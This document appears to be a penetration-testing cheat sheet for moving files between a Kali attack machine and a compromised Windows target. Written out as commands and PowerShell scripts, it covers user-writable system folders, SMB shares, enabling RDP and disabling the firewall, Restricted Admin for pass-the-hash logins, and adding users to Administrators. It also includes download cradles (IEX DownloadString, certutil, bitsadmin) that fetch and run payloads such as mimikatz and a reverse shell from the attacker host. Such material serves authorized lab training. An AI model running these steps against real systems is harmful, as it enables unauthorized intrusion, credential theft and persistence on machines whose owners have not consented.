Placing files in writeable paths
The following folders are writable by normal users by default (this depends on the Windows version; the list below is from Windows 10 1803):
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after performing a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
SMB
On Kali, extract the tools.zip archive to a directory. Change to this directory and run either of the following to set up an SMB server:
python3 /usr/share/doc/python3-impacket/examples/smbserver.py tools .
python /usr/share/doc/python-impacket/examples/smbserver.py tools .
With SMB2 support (needed for Windows 10 1709+ clients, which ship without the SMB1 client). If the Windows client rejects the anonymous share with an "unauthenticated guest access" error, also pass -username and -password to smbserver.py and authenticate from Windows with those credentials:
python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support tools $(pwd)
To copy files from Kali to Windows:
copy \\192.168.1.11\tools\file.ext file.ext
To copy files from Windows to Kali:
copy file.ext \\192.168.1.11\tools\file.ext
Connecting from Windows to Kali SMB
# Kali - host SMB share
$ python3 /usr/share/doc/python3-impacket/examples/smbserver.py [sharename] [/path/to/share] # setup local share
# Target - connect to share
cmd> net view \\[kali] # view remote shares
cmd> net use \\[kali]\[share] # connect to share
cmd> copy \\[kali]\[share]\[src_file] [/path/to/dest_file] # copy file
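Windows 10 1709 and later ship without the SMB1 client and by default refuse unauthenticated guest access to SMB2 shares, so an anonymous smbserver.py share often fails from a modern target even with -smb2support. The added example below (not part of the original page) assumes the share was started on Kali as `python3 smbserver.py -smb2support -username smbuser -password smbpass tools /path/to/tools` and maps it from the target with those credentials; the IP, share name, account and file names are placeholders.

```powershell
# Added example: map an impacket share that requires authentication, move files in both
# directions, and unmap it afterwards so no mapped drive is left behind on the target.
# Placeholders: $kali, $share, smbuser/smbpass and the file names.
$kali  = "192.168.1.11"
$share = "tools"
$cred  = New-Object System.Management.Automation.PSCredential -ArgumentList "smbuser", (ConvertTo-SecureString "smbpass" -AsPlainText -Force)

function Use-KaliShare {
    param([Parameter(Mandatory=$true)][scriptblock]$Action)
    # Non-persistent PSDrive: visible only to this session and removed in 'finally'
    New-PSDrive -Name KALI -PSProvider FileSystem -Root "\\$kali\$share" `
                -Credential $cred -ErrorAction Stop | Out-Null
    try {
        & $Action
    } finally {
        Remove-PSDrive -Name KALI -Force -ErrorAction SilentlyContinue
    }
}

Use-KaliShare {
    # Kali -> target: pull a tool into a directory normal users can write to
    $dest = Join-Path $env:SystemRoot "Tasks\winPEASany.exe"
    Copy-Item -LiteralPath "KALI:\winPEASany.exe" -Destination $dest
    # Compare with 'sha256sum winPEASany.exe' on Kali before running it
    (Get-FileHash -LiteralPath $dest -Algorithm SHA256).Hash

    # Target -> Kali: write output straight onto the share
    whoami /all | Out-File -FilePath "KALI:\whoami_$env:COMPUTERNAME.txt" -Encoding utf8
}
```

If the share still cannot be reached, confirm the server was started with -smb2support: without it only SMB1 is offered, which the client no longer speaks.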
RDP
Enable RDP (PowerShell):
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
or
reg add "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
Connect using xfreerdp:
xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:<TARGET_IP>
proxychains xfreerdp /u:<USERNAME> /p:<PASSWORD> /v:<TARGET_IP>
If RDP is available (or we can enable it) and we already have a privileged shell but no interactive session (for example SYSTEM from a service exploit), we can add our low-privileged user to the Administrators group and then spawn an elevated command prompt through the GUI after logging in over RDP:
> net localgroup administrators <username> /add
Enable RDP and add a user to the Remote Desktop Users group:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
netsh advfirewall set allprofiles state off
net localgroup "remote desktop users" alice /add
DisableRestrictedAdmin=0 turns on Restricted Admin mode, which lets xfreerdp log in with an NT hash (/pth:<HASH>) instead of a password. Turning the firewall off on all profiles is noisy; enabling only the "Remote Desktop" rule group as shown above is sufficient and easier to revert.
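The same procedure with the smallest footprint, plus the checks that tell you why a client cannot connect, as an added PowerShell example (not part of the original page). It needs an elevated shell; "alice" is a placeholder account, and the Remote Desktop Users group is addressed by its well-known SID so the script does not depend on the system language.

```powershell
# Added example: enable RDP with the minimum footprint and verify it.
# Needs an elevated shell; "alice" is a placeholder local account.
$user = "alice"

# 1. Allow Terminal Services connections (0 = allow)
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' `
                 -Name fDenyTSConnections -Value 0 -Type DWord

# 2. Make sure the listener service is running
Set-Service -Name TermService -StartupType Automatic
Start-Service -Name TermService

# 3. Open only the built-in "Remote Desktop" rule group; far less visible than
#    'netsh advfirewall set allprofiles state off' and reverted with Disable-NetFirewallRule
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

# 4. Grant RDP logon rights via the well-known SID of "Remote Desktop Users"
#    (S-1-5-32-555), which works regardless of the display language
$rdpSid = "S-1-5-32-555"
$alreadyMember = Get-LocalGroupMember -SID $rdpSid | Where-Object { $_.Name -like "*\$user" }
if (-not $alreadyMember) { Add-LocalGroupMember -SID $rdpSid -Member $user }

# 5. Verify every piece before debugging the client side
$tsKey = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
"fDenyTSConnections : $($tsKey.fDenyTSConnections)   (expect 0)"
"TermService        : $((Get-Service TermService).Status)"
"Port 3389 open     : $((Test-NetConnection -ComputerName localhost -Port 3389 -WarningAction SilentlyContinue).TcpTestSucceeded)"
Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Select-Object DisplayName, Enabled, Profile
Get-LocalGroupMember -SID $rdpSid | Select-Object Name, PrincipalSource
```

Members of Administrators can log in over RDP without being in Remote Desktop Users, so step 4 only matters for a low-privileged account.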
Powershell .ps1
This is a simple PowerShell script that downloads several files from a web server on the attacking machine into a writable directory:
$baseUrl = "http://192.168.119.139/"
$fileNames = @("PowerUP.ps1", "PowerView.ps1", "mimikatz.exe", "winPEASany.exe")
$downloadPath = "C:\Windows\Tasks"
foreach ($fileName in $fileNames) {
    $url = $baseUrl + $fileName
    $filePath = Join-Path $downloadPath $fileName
    Invoke-WebRequest -Uri $url -OutFile $filePath
    Write-Host "Downloaded $fileName to $filePath"
}
Powershell
# Download file from remote to local
powershell -c (New-Object Net.WebClient).DownloadFile('http://[host]:[port]/[file]', '[file]')
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
# Execute remote PS script
PS> IEX (New-Object System.Net.WebClient).DownloadString('http://[kali]/[script].ps1')
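Invoke-WebRequest does not exist on PowerShell 2.0 hosts (Windows 7 / Server 2008 R2 without newer WMF), and tools fetched over plain HTTP carry no integrity protection. The function below is an added example (not part of the original page) that combines the Invoke-WebRequest and WebClient methods from the two sections above with a fallback and checks the SHA256 against the digest computed on Kali with sha256sum; the server address, file list and hashes are placeholders.

```powershell
# Added example: download with Invoke-WebRequest, fall back to WebClient on PowerShell 2.0,
# and verify SHA256 using .NET directly (Get-FileHash only exists on PowerShell 4+).
# $baseUrl, the file names and the expected hashes are placeholders.
function Get-ToolFile {
    param(
        [Parameter(Mandatory=$true)][string]$Url,
        [Parameter(Mandatory=$true)][string]$OutFile,
        [string]$ExpectedSha256   # hex digest from 'sha256sum <file>' on Kali; no check if empty
    )
    if (Get-Command Invoke-WebRequest -ErrorAction SilentlyContinue) {
        # -UseBasicParsing avoids the Internet Explorer engine dependency
        Invoke-WebRequest -Uri $Url -OutFile $OutFile -UseBasicParsing
    } else {
        (New-Object System.Net.WebClient).DownloadFile($Url, $OutFile)
    }
    if ($ExpectedSha256) {
        $sha = [System.Security.Cryptography.SHA256]::Create()
        $stream = [System.IO.File]::OpenRead($OutFile)
        try {
            $actual = ([System.BitConverter]::ToString($sha.ComputeHash($stream))) -replace '-', ''
        } finally {
            $stream.Close()
        }
        if ($actual -ne $ExpectedSha256) {   # -ne is case-insensitive for strings
            Remove-Item -LiteralPath $OutFile -Force
            throw "SHA256 mismatch for $OutFile (got $actual, expected $ExpectedSha256): not keeping it"
        }
    }
    Get-Item -LiteralPath $OutFile
}

# Usage: one entry per tool, hashes taken from 'sha256sum *' on the attack box
$baseUrl = "http://192.168.119.139"
$tools = @{
    "winPEASany.exe" = "<sha256 from kali>"
    "PowerView.ps1"  = "<sha256 from kali>"
}
foreach ($name in $tools.Keys) {
    Get-ToolFile -Url "$baseUrl/$name" `
                 -OutFile (Join-Path "$env:SystemRoot\Tasks" $name) `
                 -ExpectedSha256 $tools[$name]
}
```

A mismatch deletes the file and throws, so a script that sources the tool afterwards never runs something other than what you staged.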
IWR
From Windows:
IWR -Uri http://KALI_IP:PORT -OutFile C:\Path\To\File
Certutil
From kali:
python3 -m http.server 9999
From Windows CMD:
certutil -urlcache -split -f http://<kali_ip>:9999/shell_445.exe C:\Windows\Tasks\shell_445.exe
Bitsadmin
From Windows cmd:
bitsadmin /transfer badthings http://[kali]:[port]/[src_file] [dest_file]
SSH server
Let's move files with SCP. Start an SSH server on Kali if it is not already running:
sudo systemctl start ssh
# On a Windows target (Windows 10 ships scp.exe with the OpenSSH client): download from Kali
scp <username>@<kali_ip>:/home/<username>/file.txt C:\Windows\Tasks\file.txt
# Upload from the target to Kali
scp /tmp/linpeas.out kali@<kali_ip>:/home/kali/Offensive/PGs/
Netcat
Windows:
C:\Users\offsec> nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ...
Kali:
kali@kali:~$ locate wget.exe
/usr/share/windows-resources/binaries/wget.exe
kali@kali:~$ nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
(UNKNOWN) [10.11.0.22] 4444 (?) open
The connection is received by Netcat on the Windows machine as shown below:
C:\Users\offsec> nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ...
connect to [10.11.0.22] from (UNKNOWN) [10.11.0.4] 43459
^C
C:\Users\offsec>
Socat
Alice wants to share a file with Bob:
kali@kali:~$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt
Bob downloads the file from Alice's host:
C:\Users\offsec> socat TCP4:10.11.0.4:443 file:received_secret_passwords.txt,create
Servers
Python2
python -m SimpleHTTPServer 7331
Python3
python3 -m http.server 7331
PHP
php -S 0.0.0.0:9000
Ruby
ruby -run -e httpd . -p 9000
Busybox
busybox httpd -f -p 10000